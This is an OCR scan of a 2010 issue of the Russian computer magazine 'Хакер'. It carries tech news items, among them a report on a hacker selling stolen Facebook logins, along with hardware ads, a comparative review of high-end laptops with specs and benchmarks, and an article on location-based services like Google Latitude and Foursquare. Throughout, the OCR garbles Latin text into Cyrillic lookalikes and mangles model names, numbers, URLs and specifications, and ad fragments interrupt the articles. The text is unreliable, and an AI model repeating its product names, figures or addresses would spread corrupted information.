ный пункт, магазин дарил купон на скидку в размере 5 фунтов. Итог розыгрыша 
оказался предсказуемо печален — сами того не ведая, свою бессмертную 
душу продали 88% покупателей, то есть почти 7500 человек. 





► 012 
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ОКУНИСЬ 
В ЯРКИЕ КРАСКИ 




Благодаря применению 
технологии 1_Е0*, монитор 
Ю Е50 совмещает инно- 
вационный тонкий дизайн 
с исключительной цвето- 
передачей. Разрешение 
ЕыІІ НЮ** в сочетании с 
высокой динамической 
контрастностью позволит 
уловить каждую деталь 
изображения и насладить- 
ся невероятно сочными 
красками. 



Информационная служба Ю ЕІесігопісз 8-800-200-76-76 
(бесплатная горячая линия по России). ѵѵѵѵѵѵ.Ід.гу 



[°^ш] [ «<ЭІ 

Двойной экран Автояркость 2 способа установки 

[этйгіо] (фЩ^) ^іт^] 

Система "Смарт+" Высокий контраст Энергосберегающий Тонкий 






МЕ6АЫЕѴѴ5 




ЗАКОНА «ОБ ИНТЕРНЕТЕ» 
НЕ БУДЕТ. ПОКА. 



Новый «Закон об Интернете», которого опасался весь рунет, от 
рядовых пользователей до крупных ІТ-компаний, приказал долго 
жить. Напомним, что в декабре 2009 года Правительство дало 
поручение шести ведомствам: Минкомсвязи, МВД, ФСБ, ФСО, 
ФСТЭК и Минюсту. Согласно этому поручению при Минкомсвя- 
зи была создана рабочая группа для рассмотрения вопросов 
регулирования интернета, которую возглавил Алексей Солдатов. 
Предполагалось, что она займется разработкой нового законо- 
проекта, который, как многие опасались, мог бы серьезно ужесто- 
чить цензуру в рунете. Однако ни о каком жестоком регулировании 
Сети, как оказалось, речи не идет, да и вообще было принято 
решение обойтись имеющимся законодательством - в парламен- 
те и Минкомсвязи разрабатываются лишь поправки к существую- 
щему федеральному закону «Об информации, информационных 
технологиях и о защите информации». Управиться со всем этим 
группа должна к октябрю 2010 - в законе 1 700 раз упоминается 
слово «Интернет», и им предстоит внимательно изучить все эти 
упоминания, разработать поправки, учитывающие специфику 
интернета, и устранить все разночтения. 



АККАУНТЫ ОПТОМ, 5 КОПЕЕК ЗА ПУЧОК 

Беспрецедентный по масштабности слу- 
чай продажи взломанныхучетныхзапи- 
сей социальной сети РасеЬоок обнаружи- 
ли специалисты лаборатории Юебепзе. На 
неком закрытом хакерском форуме (адрес 
не разглашается] они отыскали парня под 
ником Кігііоз, который неспешно реали- 
зовывал хакнутые аккаунты РасеЬоок по 
смешной цене: $25-45 долларов за 1000 
логинов/паролей (цена варьируется в за- 
висимости от размера партии). Бросовая 
стоимость объясняется очень просто — 
дело в том, что у хакера на руках имеется 
около 1,5 млн.угнанныхучеток. В ЮеТепзе 

ПЕРВЫЙ РОЛИК НА УОІІТІІВЕ ПОЯВИЛСЯ 5 ЛЕТ НАЗАД. 




уверяют, что продажа такого количества 
аккаунтов — дело неслыханное. Межтем, 
в подтверждение существования та кой 
базы сам Кігііоз приводит внушительную 
подборку логинов/паролей. Откуда у 
парня взялосьтакое количество а кко в, 
остается лишь гадать. Возможно, дело в 
успешной фишинговой атаке, возможно, 
в неком малваре вроде приснопамятного 
2еи5. Спецы из Юеіепзе утверждают, что 
на данный моментхакер реализовал уже 
порядка 700 тысяч ворованыхаккаунтов 
(таким образом, выручив не менее $1 7,5 
тысяч]. 



ОНИ УХОДЯТ ВСЛЕД 
ЗА ПЕРФОКАРТАМИ 



Компания 5опу официально объявила 
отом, что собирается окончательно 
остановить выпуск гибких дискет 3.5“ , 
полностью прекратив их производство 
уже к маю 201 1 года. Дискетам скоро 
исполнится 30 лет — магнитные диски 
формата 3,5 дюйма были разработаны 
самой компанией Зопу в далеком 1981 
году. Объем первой версии составлял 
720 килобайт (9 секторов], более поздняя 
версия имела объем 1440 килобайт или 
1 ,4 мегабайт (18 секторов), что и стало 



стандартом. На сегодняшний деньЗопу 
принадлежит почти 70% этого рынка, так 
как многие производители уже давно 
прекратили выпуск дискет, а те, кто еще 
не успел, собираются сделать это в самом 
ближайшем будущем. Поставки дискет 
за пределы Японии в Зопууже отменили, 
такчтотеперьдело осталосьза малым. 
Прощайте, дискеты, мы будем скучать! 

И через что же нам теперь смотреть на 
затмение?.. 




► 014 
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ЗОНЕ .РФ ДАЛИ ЗЕЛЕНЫЙ 
СВЕТ 



Ну воти все, организация ІСАЫЫ 
(Іпіегпеі Согрогаііоп Тог АззідпесІ 
ІЧатезапсІ ІЧитЬегз] вынесла офи- 
циальное решение, разрешив Рос- 
сии пользоваться доменом «.РФ» 
и ни в чем себе не отказывать. Это 
означает, что кириллическому инету 
— быть и здравствовать, а также это 
делает Россию первой страной в 
мире, обзаведшейся собственным 
национальным кириллическим 
доменом верхнего уровня. Помимо 
этого Минкомсвязи сообщает, что 
Ібапреля Совет Координационного 
центра национального домена сети 
интернетутвердил новое Положе- 
ние о приоритетной регистрации 
доменных имен в домене«.РФ» — 
оно вступит в силу 12 мая текущего 



года. Новое положение призвано 
расширить список категорий 
пользователей, которые будут иметь 
право на регистрацию доменов в 
зоне «.РФ» в приоритетном поряд- 
ке. Поданным на 21 апреля, взоне 
«.РФ» было зарегистрировано уже 
9936 доменов, из которых 5% соста- 
вили домены для государственных 
нужд. Приоритетная регистрация 
завершится 1 6 сентября, и после 
нее стартует открыта я регистрация 
для всехжелающих. 





...И ЯБЛОКИ 
СВОИ 

ЗАБЕРИТЕ! 



Между компаниями АбоЬе и Арріе уже давно существует немалое ко- 
личество разногласий, основная причина которых — технология РІазГі. 
Венцом всему стала запись в блоге главного менеджера по связям с 
разработчиками платформы РІазГі, Майка Чамберса. 

В своем посте он сообщил, что в ближайшем будущем АбоЬе планирует 
прекратитьтратить человеческие и финансовые ресурсы на поддер- 
жаниетехнологии РІазГі для іРГіопе. В пакете АбоЬе Сгеаііѵе 5и іііе 5 
возможность конвертации РІазГі-кода в приложения для ІРГіопе пока 
сохранится, но что будет дальше — не совсем понятно. 

В пику закрытым разработкам Арріе Чамберстакже усиленно хвалил в 
своем посте другие мобильные ОС, в частности много лестных слов пе- 
репало АпбгоісГу от Ооодіе. «Лично я собираюсь переключиться на ап- 
параты на базе АпбгоісІ (особенно меня интересуют АпбгоісІ-планшеты, 
которые должны выйти в этом году] и больше не собираюсьуделятьтак 
много внимания тому, что связано с ІРГіопе», — пишет Чамберс. 



ПО ПОДСЧЕТАМ КОМПАНИИ САШІСАІ., АКТИВНЫХ ШІШ-ЮЗЕРОВ УЖЕ 1 2 
МЛН. ЧЕЛОВЕК. ТОГДА КАК ОСЕНЬЮ 2008 НАСЧИТЫВАЛОСЬ ЛИШЬ 8 млн. 





Іпзрігіпд Іппоѵаііоп • Регзізіепі РегТесТіоп 




2 Комфортная скорость для всех приложений! 
Графическая настройка приоритетов 

Удобное перераспределение ширины канала между такими приложениями, 
как голосовые программы, игры, приложения, использующие потоки аудио 
и видео, а также РТР и Р2Р 



его беспроводного комфорта 



Не требует специальных знаний! 

Быстрая настройка беспроводной сети и Іпіегпеі 

Утилита АЗУЗ Е25еШр/ ѴѴРЗ ѴѴііагсі - настройка защищенной беспроводной сети 
и Іпіегпеі-соединения за 2 минуты с предустановками для провайдеров более 
чем в 100 городах России 



& 

4 



■ 









3 



Универсальность и функциональность! 
Подключение Ц$В устройств 

АЗІІЗ Е 1 Рііе ЗТіагіпд - личный сетевой файл-сервер с доступом через Іпіегпеі: 
АЗУЗ Е7. Ргіпіег Зііагіпд - принт-сервер для поддержки одновременной печати 
и сканирования 




ВТ-ШІІ 



Многофункциональный 

беспроводной 

шѵ/.а$и$.ги Всемирная гарания 2 года Горячая линия: 8-800-1 00-2787 маршрутизатор 802 . 1 1 N 



Товар сертифицирован, на правах рекламы. 







РЕВКІІМ 



I Сергей Никитин 



Г 













Ізипд 




м зиісііо 
1515 



ШІіАВѴІЬ 

ОА-МА770Т- 



сіѵбі 



СИЛА 



г 



АсегАзріге 

П/ПР 



5 Раѵііі 
сіѵбі 



В МОБИЛЬНОСТИ 

ТЕСТИРОВАНИЕ МОЩНЫХ НОУТБУКОВ 



Несмотря на то, что настольные компьютеры обладают массой преимуществ, сегодня 
все больше и больше людей приобретают ноутбук в качестве не дополнительного, 
мобильного, а основного компьютера. Как правило, маршруттакого ноутбука это 
квартира - машина - работа и наоборот. Сегодня мы протестировали как раз такие 

устройства. 



МЕТОДИКА ТЕСТИРОВАНИЯ 

Для проверки быстродействия мы использовалитри группы программ. В 
первую входили синтетические бенчмарки ЗОМагк' 06 и РСМагк Ѵапіаде. Во 
вторую группу программ вошел тест, встроенный в архиватор ѴѴіпРАР, де- 
монстрирующий нам скорость работы связки «процессор + память», а также 
программа ВирегРі, серьезно нагружающая систему вычислением числа 
«пи»сточностьюдодвухмиллионовзнаков после запятой (мы использова- 
ли именно этот параметр]. Третью группу составили бенчмарки, встроенные 
в игры: современные и красивые приложения Резібепі: Еѵііб иТот Сіапсу’з 
Н.А.ѴѴ.Х. Всетесты проводились при работе как от сети, та к и от аккумуля- 
тора. Такой важный параметр каквремя работы от батареи мы проверяли 
с помощью программы ВаИегу Еа(:егРгоѵ2.70. Все исследования прово- 
дилисьс использованием схемы питания Ваіапсесі (сбалансированный]. 
Стоит отметить, что тесты РСМагк (всех версий] сами по себе также являются 
своеобразным испытанием на длительность автономной работы ввидутого, 
что они проходяточеньдолго (практически час], при этом серьезно нагружая 
всю систему. В этот раз с РСМагк Ѵапіаде справились все участники тестиро- 
вания, но раньше при тестах ноутбуков часто случалось, что ресурса батареи 
устройства не хватало, чтобы вы пол нить тест до конца. 



ВАТТЕРУЕАТЕР 

ТозЫЬа СІозтіоХбОО 
БатзипдРбво 
М5І6Т729 
НРРаѵіІіопсіѵб 
Оеіі Біисііо 1515 
АсегАзріге 57406 

О 20 40 60 80 100 120 

■ от батареи минуты (больше-лучше) 

Лучшее время автономной работы показал М5І 6Т729, при этом он 
обеспечивает весьма высокую производительность 



ТЕХНОЛОГИИ 

Основными отличиями мощных ноутбуков, которые из-за их габаритов слож- 
но назвать в полной мере мобильными компьютерами, от их действительно 
легко транспортируемых собратьев являются, помимо размеров, мощные 
компоненты. В частности это видеоподсистема, которая вполне позволяет 
играть в современные игры, что и доказали наши тесты. Конечно, не стоит 
рассчитывать на самые крутые настройки в новейшем шутере, но все-таки 
это нечто на по рядок пре восходящее стандартные ноуты, в которых зачастую 
используется встроенное графическое решение. Обратной стороной мощ- 
ности и дополняющей ее большой диагонали дисплея являются большие 
габариты, немалый веси высокое энергопотреблениеустройства, которое 
повышаетнагрев иуменьшаетвремя автономной работы. С одной стороны, 
это не очень большие недостатки, если учестьто, что да иные устройства в ос- 
новном используются вместо настольных компьютеров, а не как мобильные, 
с другой стороны, любому ноутбуку может быть придется работать автономно, 
в дороге, и эти моменты нужно учитывать. 



ТОМ СІ.АМСѴ’3 Н.А.ѴѴ.Х. 



ТозЫЬа СІозтіоХбОО 

5атзипдВб8о 

М5І6Т729 

НРРаѵіІіопсіѵб 

ОеІІБіисІіоібіб 

АсегАзріге 57406 

■ от сети ■ от батареи 




Трз (больше-лучше) 



Наибольшее число і рз было зафиксировано на НР Раѵіііоп сіѵб, при- 
чем просадка при работе от батареи была не слишком значительная 



► 016 



ХАКЕР 06 /137/ 10 




ЗІІРЕРРІ 



ТозЫЬа ОозтіоХбОО 
Батзипд Р580 
М51 6Т729 
НРРаѵіІіопсІѵб 
ОеиБіисІіо 1515 
АсегАзріге 57406 

■ от сети от батареи 




{рз (больше-лучше) 




ѵшкар 

ТозЫЬа ОозтіоХбОО 
Батзипд К580 
М51 6Т729 
НРРаѵіІіопсІѵб 
ОеиБіисііо 1515 
АсегАзріге 57406 



■ от сети 



от батареи 




II Зіисііо 
1515 




Казалось бы, и в этом тесте должен был выиграть лаптоп с самым 
новым процессором, однако БирегРі — однопоточный тест, и тут все 
определяет тактовая частота 




ПРОЦЕССОР, ГГЦ: 2.1 , ІЫТЕІ_ СОРЕ ІЗ-ЗЗОМ 

ПАМЯТЬ, ГБ: 3 
ДИСПЛЕЙ: 15.6”, 1366X768 

ВИДЕОКАРТА, МБ: 512, АТІ МОВІЫТУ ВАОЕОІМ НО 5470 

ЖЕСТКИЙ ДИСК, ГБ: 250 
ОПТИЧЕСКИЙ ПРИВОД: ОѴО 51ІРЕП МІД.ТІ ОЕ 
СРЕДСТВАСВЯЗИ: МОДЕМ, 6І6АВІТ ЕАІЧ, ВШЕТООТН, ѴѴІ-ЕІ 
802.1 1В/6/ІМ 

ИНТЕРФЕЙСЫ: 4Х 115В, IX НОМІ, ѴОА, 50, ММС, ХО, М5, М5 РВО, 5/ 
РОІЕ, МІС, ЕАР 

ГАБАРИТЫ, ММ: 383X250X26-37 

ВЕС, КГ : 2.8 



□ □□ 



+ 

Открыв крышку устройства, мы увидели веб-камеру, блок цифровых 
клавиш на клавиатуре, несколько дополнительных кнопок и тачпад, 
оснащенный линией прокрутки. Приятные сюрпризы начинаются сразу! 
Тачпад несколько смещен влево, но кэтому можно быстро привыкнуть. 
Блок цифровых клавиш придется по вкусутем, кто проводит много 
времени за скучными офисными программами, высокая производитель- 
ность и большое время автономной работы — вообще всем, а красиво 
подсвеченная кнопка включения усладит эстетов. 



А вот отсутствие разъема ОѴІ или НОМІ нас несколько разочаровало. 
Подключить внешний монитор или проектор можнотолько через порт 
0-5иЬ. Наличие модема — весьма спорное решение, ведь вместо него 
можно было установить нечто более полезное и современное. 



Архивирование в ѴѴіпРАР существенно нагружает СРІ) ноутбука и 
победитель очевиден — ТозЫЬа ОозтіоХбОО, оснащенный новей 
шим ІпІеІСогеі 7 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ПРОЦЕССОР, ГГЦ: 2, ІІЧТЕИ МОВЫЕ СОНЕ 2 00016400 

ПАМЯТЬ, ГБ: 2 
ДИСПЛЕЙ: 15.6”, 1280X800 

ВИДЕОКАРТА, МБ: 512, АТІ МОВІЫТУ ВАОЕОІЧ НО 4570 

ЖЕСТКИЙ ДИСК, ГБ: 150 
ОПТИЧЕСКИЙ ПРИВОД: ОѴО 51ІРЕР МІЛТІ 
СРЕДСТВАСВЯЗИ: ОІѲАВІТ ЫАЫ, ВШЕТООТН, ѴѴІ-ЕІ 802.1 1В/0/Ы 
ИНТЕРФЕЙСЫ: 2Х 05В, ѴОА, 1ХЕ5АТА, IX НОМІ, 1ХМІІЧІ ЕІВЕѴѴІВЕ, 
ЕХРВЕ55САВ0, 50, ММС, МБ, М5 РРО, МІС, ЕАР 
ОПЕРАЦИОННАЯ СИСТЕМА: ѴѴІІХЮ0ѴѴ5 ѴІ5ТА НОМЕ ВА5ІС 
ГАБАРИТЫ, ММ: 371X252X30 
ВЕС, КГ: 2.7 



□ □□ 



+ 

Кнопка включения размещена сбоку, так что придется некоторое время 
поискать ее натонком корпусе устройства. Периметр корпуса занят 
портами и разъемами: кроме стандартных там присутствуютеЗАТА, НОМІ 
и тіпі ЕігеѴѴіге. Оснащенный хорошими компонентами, данный ноутбук 
показал весьма высокие результаты во всех нашихтестах. Особенно он 
отличился в испытании на длительность работы от батареи, продержав- 
шись более 100 минут. Под крышкой нас ждут та кие приятные мелочи как 
ѵѵеЬ-камера и клавиатура с кнопками стандартного, а неуменьшенного 
размера. 




Внешний вид ноутбука не отличается оригинальностью. Да и набор ин- 
терфейсов не самый богатый, например, разъемов 115В здесь всего два. 
Также было бы нелишним наличие портов НОМІ или ОѴІ. 
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► 017 







РЕВКІІМ 



Затзипд 

К580 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ПРОЦЕССОР, ГГЦ: 1 .6, ІІ\ІТЕІ_ СОКЕ І7-О720М 

ПАМЯТЬ, ГБ: 4 

ДИСПЛЕЙ: 15.6”, 13667768 

ВИДЕОПЛАТА, МБ: 1024, ІЧѴЮІА СЕРО ПСЕ ОТ 230 М 

ЖЕСТКИЙ ДИСК, ГБ: 250 

ОПТИЧЕСКИЙ ПРИВОД: ОѴО 51ІРЕН МІЛТІ ОЬ 

СРЕДСТВАСВЯЗИ: ОІОАВІТЕАЫ, В Ьи ЕТООТН , ѴѴІ - РІ 802.1 1 В/Ѳ/Ы, ІРОА 

ИНТЕРФЕЙСЫ:4Х 115В, Ѵ6А, 1ХНЮМІ, IX Е5АТА (СОВМЕЩЕН С ІІБВ], 

1ХМІЫІ ЕІНЕѴѴІНЕ, 50, М5, М5 РНО, ММС.ХО, МІС, ЕАР, ПОРТ ДЛЯ ДОК- 

СТАНЦИИ, ЕХРРЕ55САР0 

ОПЕРАЦИОННАЯ СИСТЕМА: ѴѴІШ0ѴѴ5 7 НОМЕ АОѴАЫСЕО 

ГАБАРИТЫ, ММ: 258X358X37 
ВЕС, КПЗ 

■■■■■■■□□□ 

+ 

Стильный ноутбук небольшого размера. Но не стоит считать его бесполез- 
ной малявкой, так каку него есть масса функциональных плюсов: полный 
набор коммуникационныхустройств, шикарный набор интерфейсов, блок 
цифровых клавиш, которые по радуют трудоголиков. Вн^ри скрыты весьма 
и весьма неплохие компоненты, что подтверждают наши тесты. Да, это 
не феноменальная скорость, но вполне приличные показатели, поэтому 
можно утверждать, что работа с большинством задач и приложений будет 
комфортна. Приятным дополнением ста нет отдельно продающаяся док- 
станция, обладающая множеством полезных портов. 



шидцу іь 
ОА-МА770Т- 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ПРОЦЕССОР, ГГЦ: 2.53, ІІМТЕЕ СОВЕ 2 01)0 Р9500 

ПАМЯТЬ, ГБ: 4 
ДИСПЛЕЙ: 17”, 1680X1050 

ВИДЕОПЛАТА, МБ: 1 024, АТІ МОВІЫТУ НАПЕОЫ НО 4850 

ЖЕСТКИЙ ДИСК, ГБ: 300 
ОПТИЧЕСКИЙ ПРИВОД: ВО-НОМ 

СРЕДСТВАСВЯЗИ: МОДЕМ, ОІОАВІТ ЕАІЧ, ВШЕТООТН, ѴѴІ-ЕІ 802.1 1 
В/Ѳ/Ы 

ИНТЕРФЕЙСЫ: ЗХ 115В, 1ХМІЫІ ЕІВЕѴѴІВЕ, 1ХЕ5АТА, IX НОМІ, ѴОА, 50, 
РСМСІА, МІС.ЕАВ 

ОПЕРАЦИОННАЯ СИСТЕМА: І\І\А 
ГАБАРИТЫ, ММ: 395X278X26.5-35 

ВЕС, КПЗ. 2 

■■■■■■■■■□ 

+ 

Отаббревиатуры ОТ веет скоростью, поэтому корпус выполнен в цвето- 
вой схеме «красное и карбон». Полное соответствие спортивному ав- 
томобилю: под крышкой-капотом размещены мощный движок и другие 
компоненты, которые позволяют отлично проводить время как в пробках 
и трассах с ограниченной скоростью, так и на автобанах. Большой дис- 
плей отлично подойдет какдля работы (не нужно листать страницы], так 
и для игр (без комментариев). Приятным дополнением будет дисковод 
Віи-гау — даже если им пока не пользоваться, то уже можно похвастать- 
ся. И теставтономной работы — о нем нельзя не сказать, так как пройден 
он был на отлично. 



Самый главный недостаток данного ноутбука — малое время авто- 
номной работы. Как показало наше тестирование, по этому пара- 
метру данная модель плетется в хвосте. Да и отсутствие интерфейса 
НОМІ также не идет ему в плюс. 



Удалось ему это, правда, за счет большой батареи, выпирающей из кор- 
пуса. Поскольку кнам в лабораторию попал инженерный сэмпл — на нем 
не было установлено ОС. А вот причину, по которой бенчмарк РСМ а гк 
Ѵапіаде не выдал результатов тестирования, выяснить неудалось. 



► 018 
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АсѳгАзріге 

57406 




5АМЗІМ6 
Р580 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ПРОЦЕССОР, ГГЦ: 2.53, ІІ\ІТЕІ_ СОКЕ І5-540М 
ПАМЯТЬ, ГБ: 4 
ДИСПЛЕЙ: 15.6”, 1366X768 
ВИДЕОПЛАТА, МБ: 1024, ІМѴЮІА ОЕЕОРСЕ ОТЗЗОМ 
ЖЕСТКИЙ ДИСК, ГБ: 500 
ОПТИЧЕСКИЙ ПРИВОД: ОУО 51ІРЕВ МІД.ТІ йЬ 
СРЕДСТВАСВЯЗИ: ОІѲАВІТЕАЫ, В Ьи ЕТООТН , ѴѴІ - РІ 802.1 1 В/О/Ы 
ИНТЕРФЕЙСЫ: 4Х 115В, 115В 5ЕЕЕР-АІ\Ю-С НАВОЕ, IX ЕЮМІ, 1ХЕ5АТА 
(СОВМЕЩЕН С 115В], 50, 50НС, ММС, Ѵ6А, ЕХРВЕ55САВ0, МІС, ЕАР, 
ОПЕРАЦИОННАЯ СИСТЕМА: ѴѴІІХЮ0ѴѴ5 7 РВ0ЕЕ55І0ЫАЕ 
ГАБАРИТЫ, ММ: 358X264X28.6-36.5 
ВЕС, КГ : 2.7 




□ □ 



+ 

Очень стильный тонкий корпус этого ноутбука, на котором не остается 
отпечатков пальцев, будет привлекать внимание и кего владельцу. Так 
что если тебе нужны восторженные взгляды, то это устройство тебе под- 
ходит. Наши тесты показали, что кроме стильности он еще и достаточно 
быстр, а наличие ѵѵеЬ-камеры, блока цифровых клавиш и полного комму- 
никационного набора тонко намекаетна функциональностьустройства. 
Очень интересной особенностью также является возможность подзаря- 
жать различные устройства через особый ІІ5В-портдаже когда ноутбук 
выключен. 





ТОЗНІВА ООЗМІО 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ПРОЦЕССОР, ГГЦ: 1 .73, ІІЧТЕИ СОРЕ 17-0820 

ПАМЯТЬ, МБ: 4 
ДИСПЛЕЙ: 18.4”, 1920X1080 
ВИДЕОПЛАТА, МБ: 1 024, КІѴЮ1А ОЕЕОРСЕ 6Т5 250М 

ЖЕСТКИЙ ДИСК, ГБ: 2X320 
ОПТИЧЕСКИЙ ПРИВОД: ѴУО 51ІРЕР МЮІ 
СРЕДСТВАСВЯЗИ: ЕАЫ, ВШЕТООТН, ѴѴІ-ЕІ 802.1 1 В/О/Ы 
ИНТЕРФЕЙСЫ: ЗХ 015В, 1ХЕ5АТА, 1ХНОМІ, 1ХМІЫІ ЕІРЕѴѴІРЕ, 
ЕХРРЕ55САР0, 5Р, М5,Х0, ѴОА, МІС, ЕАР 
ОПЕРАЦИОННАЯ СИСТЕМА: ѴѴІШ0ѴѴ5 7 II ИІ МАТЕ 
ГАБАРИТЫ, ММ: 442.6X294.2X41 .5 
ВЕС, КГ :4.6 





□ 



+ 

Этот ноутбук оснащен самым большим дисплеем в нашемтесте — 18,4 
дюйма! Крометого, открыв крышку, мы видим очень симпатичную 
клавиатуру с подсветкой, блок цифровых кнопок, а также сенсорную 
панель с дополнительными клавишами. Дальнейшее напоминает крутой 
триллер: устройство оснащено сканером отпечатков пальцев и системой 
распознавания лица, такчто безопасности тутуделено немало внима- 
ния. Не забыты и интерфейсы, портов и разъемов на корпусе масса, а 
также производительность: мощные компоненты выдали соответствую- 
щий результат. 



Результаты времени автономной работы не самые выдающиеся среди 
протестированных моделей. Также к недостаткам следует отнести 
отсутствие порта НЭМІ. 



Гигантские габариты этого ноутбука многим могут не понравиться. И что 
расстраивает — от батареи ноутбук работает чуть больше часа. К нам 
попал инженерный образец, видимо поэтому мы не смогли получить 
конечный результат в тесте РСМагк Ѵапіаде. 



ВЫВОДЫ 

Итак, первым в нашем тесте оказался 
М5І ОТ729, собранный на базе отличных 
компонентов, в число которых входит и 
привод В Іи - гау. В ходе тестов эта модель 



продемонстрировала отличные результаты, 
за что и была удостоена наградой «Выбор 
редакции». Ноутбук Ватзипд Р580 получает 
награду «Лучшая покупка» за умеренную 
цену и хорошо сбалансированные комплек- 
тующие. Если ты не стеснен в средствах, то 



обрати внимание на ТозЫЬа ОозтіоХбОО — 
кроме цены, превышающей стоимость двух 
вместе взятых сегодняшних победителей 
(да и практически любого настольного ПК], у 
этого устройства практически нет недостат- 
ке в . *т~ 



ХАКЕР 06 / 137 / 10 



► 019 





На что способны сервисы, основанные 
на местоположении абонента 

Еще не так давно модуль 6Р5 был отличительной чертой топовых моделей смарт- 
фонов, а сама технология использовалась только в навигационных продуктах. 
Сегодня чип для вычисления координат с помощью спутников встроен в любой 
средний смартфон, а возможность узнать месторасположение абонента открыла 
путь для создания немалого количества полезных сервисов. 



К огда человек выбирает более 

дешевый смартфон без ВР5 только 
потому, что у него нет машины и 
навигация ему не нужна, он сильно не 
прав. На самом деле он отказывает 
себе в удовольствии оказаться на гребне 
волны. Вместе с удешевлением самих модулей 
ВР5 мы получили еще один важный бонус — 
нормально работающий мобильный инет. Во 
многих городах стремительно разворачиваются 
сети 30, а сотовые операторы помаленьку 



предлагают безлимитные тарифы. В связке 
идет возможность всегда оставаться опііпе, 
а данные о точном расположении позволяют 
использовать современные І_осабоп ВазесІ 
сервисы. Впрочем, многие из них можно юзать 
и без 0Р5. 

60061-Е ЛОКАТОР 

Впецслужбы могут найти человека по сигналу 
от его мобильника. Ты тоже можешь, но толь- 
ко если вы оба используете Воодіе Локатор. 



Чтобы получить дистрибутив, подходящий для 
платформы, прямо с телефона в мобильном 
браузере заходи на ѵѵѵѵѵѵ.доодІе.сотДаЦІисІе . 

Что дальше? Ты получишь доступ к уже ставшей 
родной карте от Воодіе, на которой, помимо 
всего прочего, появится новый объект — ярлы- 
чок с твоим расположением. Добавь друзей, 
которые также установили эту программу, и 
будешь видеть, где в текущий момент нахо- 
дятся они. Все работает очень четко, чего уж 
там — все-таки ВР5. Но надо видеть лица тех 



► 020 
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Геотег в ТѵѵіНег'е позволяет 
обозначить место, откуда ты 
отправляешь твит 

пользователей, которые лицезреют на экране 
свое довольно точное месторасположение, 
хотя никаких навигационных приблуду них не 
было и в помине! В действительности мно- 
гие І_В5-сервисы могут работать и без ОРЗ, 
определяя координаты по базовым станциям, 
которые находятся поблизости, и даже по ѴѴі-Рі 
точкам доступа (читай подробнее во врезке]. Я 
довольно быстро сагитировал десяток друзей, 
которые стали активно пользоваться програм- 
мой. Поначалу запускать и смотреть, кто где 
есть, и кто есть рядом. Было прикольно, пару 
раз даже получалось таким образом встретить- 
ся в торговом комплексе. Но очень скоро стало 
понятно, что за картой постоянно не уследишь, 
а если так, то никакого толка, кроме фана, от 
использования ты не получишь. Но тут ребя- 
та из Ооодіе молодцы. В последних версиях 
Локатора появилась возможность включать 
оповещения о месторасположении. Другими 
словами, когда в следующий раз кто-то из 
друзей будет поблизости, то ты получишь 5М5! 
Это будет покруче, чем геотег в Тѵѵіііег'е — спе- 
циальная опция, позволяющая снабдить каж- 
дый твит координатами или описаниями места, 
откуда он был отправлен. Система оповещений 
Локатора интеллектуальна. Она не будет слать 
5М5-КИ каждый раз, когда твой коллега прихо- 
дит на работу. Оповещения присылаются только 
в случаях: 

• когда ты или твой друг находитесь в непри- 
вычном месте; если друг находится в при- 
вычном месте (например, дома или на работе), 
оповещения не присылаются. 

• ты или твой друг находитесь в часто посе- 
щаемом месте, но в необычное время. 

Сбор данных и анализ привычных для тебя 
мест пребывания могут занять около недели, 
после чего начнется отправка оповещений. 
Правда, для этого надо не забыть включить 
в настройках опцию «История местораспо- 
ложений», но надо иметь в виду, что с этого 
момента все твои перемещения логируются 

— их можно очень удобно просмотреть, запро- 
сив информацию за любое время. Вдобавок 
у этого интересного сервиса есть и другие 
полезные опции, например, автоматическое 
обновление статуса в Оіаік или составление 
виджета для сайта/блога с указанием текуще- 
го месторасположения. 

ЛОКАТОР 2.0 

Впрочем, с какой стороны не посмотри, Ооодіе 
Локатор — в целом очень простой сервис, 



который в первую очередь отображает на 
карте тебя и твоих соседей. При этом никак 
не конкретизируется, в каком именно месте 
ты находишься: на сеансе в кинотеатре, 
обедаешь в кафе или просто пришел на 
учебу. Новый тренд на западе, набирающий 
ошеломляющие обороты — сервисы Ооѵѵаііа 
[ доѵѵаЦа.сопг І и Роигздиаге Роигздиаге. 
сот ), которые прокачали идею Локатора, 
добавив в нее элемент социальной сети. Это 
два аналогичных и жестко конкурирующих 
между собой сервиса, позволяющих делиться 
информацией о своем месторасположении 
и местах, которые посещаешь. Помимо этого 
ты видишь, кто еще бывал в этих местах, и 
какие советы он там оставлял. Получается 
классный справочник по различным местам 
и заведениям с автоматическим поиском и 
привязкой по месторасположению. Достал 
телефон — и сразу видишь, что есть в окру- 
ге. Читаешь отзывы — решаешь, куда стоит 
пойти. Зашел внутрь, поставил соответствую- 
щий статус — можешь ждать друзей. Это назы- 
вается сбеск іп :). 

Сервисы бурно развиваются и добавляют 
новые фичи. Если ты живешь в крупном 
городе, то попробовать один из них нужно в 
обязательном порядке. Даже в России набра- 
лась довольно большая база пользователей, 
которые с удовольствием делятся информаци- 
ей. Достаточно завести аккаунт, найти друзей, 
импортировав контакты из Отаіі'а, ТѵѵіНег'а и 
других сервисов, и установить мобильное при- 
ложение на свой телефон. В принципе, даже 
необязательно, чтобы мобила поддерживала 
ОРЗ — месторасположение, опять же, очень 
здорово определяется по видимым в округе 
сотовым вышкам. В любой момент программа 
отображает забитые в ее базу места и отзывы 
по ним. Если ты пришел в какое-то место, а 
нужного объекта в базе сервиса нет, смело 
создавай свой. Активность пользователей вся- 
чески поддерживается. Еоигздиаге проводят 
маркетинговые акции: если первый придешь в 
ресторан, то получаешь 50% скидку на обед и 
т.п. К тому же, со временем ты набираешь рей- 
тинг, что позволяет тебе видеть больше инфор- 
мации, чем все остальные. Приложение сейчас 




Локатор запущен на буке, 
а месторасположение 
определено по ѴѴі-Рі 



существует для платформ іРЬопе, АпбгоісІ, 
ВІаскВеггу и других девайсов. Увы, ѴѴіпсІоѵѵз 
МоЬіІе и ЗутЬіап в списке нет. Зато клиенты 
для этих платформ есть у российского альтер- 
нативного проекта — АНегОео (аНегдео. ги] . 
Используя собственную гибридную технологию 
позиционирования (ѴѴіЕі+65М+ѴѴіМах+ІР], 
сервис определит местоположение и подска- 
жет заведения поблизости, узнает, как далеко 
от тебя твои друзья и какие люди находятся 
рядом. Причем, поскольку в АИегОео встроены 
карты Ооодіе, Яндекс. Карты и ОрепЗігееіМарз, 
работать с приложением можно в любой точке 
мира. 

